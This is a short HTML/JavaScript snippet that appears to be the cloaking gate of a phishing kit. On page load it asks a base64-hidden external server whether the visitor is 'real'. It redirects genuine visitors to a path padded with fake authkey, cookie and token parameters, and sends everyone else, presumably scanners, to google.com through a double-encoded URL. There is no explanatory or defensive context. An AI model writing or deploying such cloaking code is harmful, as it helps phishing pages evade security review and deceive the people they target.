<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>let checkme=location.href.includes("type=passed")||location.href.includes("type=go");let locat="";
    if(checkme===true){locat=location.href.replace("?type=passed","").replace("?type=go","").replace("type=passed","").replace("type=go","");let ed=getParameterByName(urlcheck("index.html","authkey/AKOcovflGLOPrqc/parid=root.html")).replace("?type=passed","").replace("?type=go","");window.location.replace(ed+"&access=passed");}
    let isBlack=!1;$(document).ready(function(){if(checkme===false){if(!0===rd()){let e=getParameterByName(urlcheck("index.html","authkey/AKOcovflGLOPrqc/parid=root.html"));window.location.replace(e+"&access=passed")}else!0===isBlack||window.location.replace(window.atob(window.atob("YUhSMGNITTZMeTkzZDNjdVoyOXZaMnhsTG1OdmJRPT0=")))}});
    function getParameterByName(e){let t="";const i=new URL(e);let l=i.search.split("?").join("&").split("&&").join("&"),n=i.search.split("?").join("&");n=n.split("&&").join("&");let r=i.href.split("?")[0];return $.each(n.split("&"),function(e,i){var n="---"+i.split("=")[0]+"---";t.includes(n)?l=l.replace("&"+i,"").replace(i,""):t+=n}),(r+"?"+l).replace("?&","?")}
    function urlcheck(e,t){let r=locat.length>3?locat:location.href;return r.includes("?"),r.includes(e)?r=r.replace(e,t):r.endsWith("/")?r+=t:r=r+"/"+t,r=r+"?scriptID="+Math.random().toString().replace("0.","")+"&cookies="+window.btoa(Math.random().toString()).replace("=","").replace("=","")+"&token="+Math.random().toString().replace("0.","")}
    function rd(){let e;return $.ajax({dataType:"json",url:window.atob("aHR0cHM6Ly9sb2FkZHJpcmVjdGpzb24uaGVyb2t1YXBwLmNvbS8="),type:"GET",async:!1,cache:!1,timeout:3e4,success:function(s){s.hasOwnProperty("isreal")? (true!==s.isreal?e=!1:e=!0):e=!1},error:function(s){e=!1}}),e}
</script>